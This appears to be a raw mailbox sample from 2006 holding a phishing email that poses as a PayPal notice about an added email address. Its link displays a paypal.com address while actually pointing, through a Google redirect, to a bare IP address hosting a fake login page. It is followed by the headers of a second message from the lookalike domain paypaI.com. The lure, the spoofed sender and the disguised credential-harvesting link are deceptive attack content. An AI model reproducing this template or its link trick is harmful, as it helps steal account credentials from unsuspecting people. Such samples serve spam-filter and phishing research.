From: "service@paypal.com" <service@paypal.com>
Subject: You have added a new credit card home address !
Date: Mon, 13 Feb 2006 21:19:40 -0000
MIME-Version: 1.0
Content-Type: text/html;
	charset="Windows-1251"
Content-Transfer-Encoding: 7bit
X-Priority: 3
X-MSMail-Priority: Normal
X-Mailer: Microsoft Outlook Express 6.00.2600.0000
X-MimeOLE: Produced By Microsoft MimeOLE V6.00.2600.0000
To: undisclosed-recipients: ;
Status: O
X-Status: 
X-Keywords:                  
X-UID: 392

<div id="message">
  <pre><tt>
  
  You have added laptopseller@yahoo.com as a new email address for your 
PayPal account.

If you did not authorize this change or if you need assistance with 
your account, please contact PayPal customer service at:

<a target="_blank" href="http://www.google.com/url?sa=U&q=http://81.196.204.130:82/webscr/index.php">https://www.paypal.com/row/wf/f=ap_email</font></a><br>



Thank you for using PayPal!
The PayPal Team


Please do not reply to this e-mail. Mail sent to this address cannot be
answered. For assistance, log in to your PayPal account and choose the
"Help" link in the header of any page.

----------------------------------------------------------------
                    PROTECT YOUR PASSWORD

   NEVER give your password to anyone and ONLY log in at
https://www. paypal. com/  Protect yourself against fraudulent websites 
by opening a new web browser (e.g. Internet Explorer or Netscape) and typing
in the PayPal URL every time you log in to your account.

----------------------------------------------------------------     


PayPal Email ID PP007

</tt></pre>
</div>

From do-not-reply@paypaI.com  Mon Feb 13 17:59:10 2006
Return-Path: <do-not-reply@paypaI.com>
X-Original-To: nobody@login.example.com
Delivered-To: nobody@login.example.com
Received: from mail1.example.com (mail1.example.com [10.1.2.3])
	by naughty.example.com (Postfix) with ESMTP id ECDB05370A7
	for <nobody@login.example.com>; Mon, 13 Feb 2006 17:59:09 -0500 (EST)
Received: from schoolmusic.co.kr (unknown [211.115.214.74])
	by mail1.example.com (Postfix) with ESMTP id 7B6C66CCF17
	for <nobody@example.com>; Mon, 13 Feb 2006 17:59:09 -0500 (EST)
Received: from User (adsl86-34-8-208.romtelecom.net [86.34.8.208] (may be forged))
	(authenticated bits=0)
	by schoolmusic.co.kr (8.12.9/8.12.9) with ESMTP id k1DMhBmY032391;
	Tue, 14 Feb 2006 07:43:14 +0900
Message-Id: <200602132243.k1DMhBmY032391@schoolmusic.co.kr>
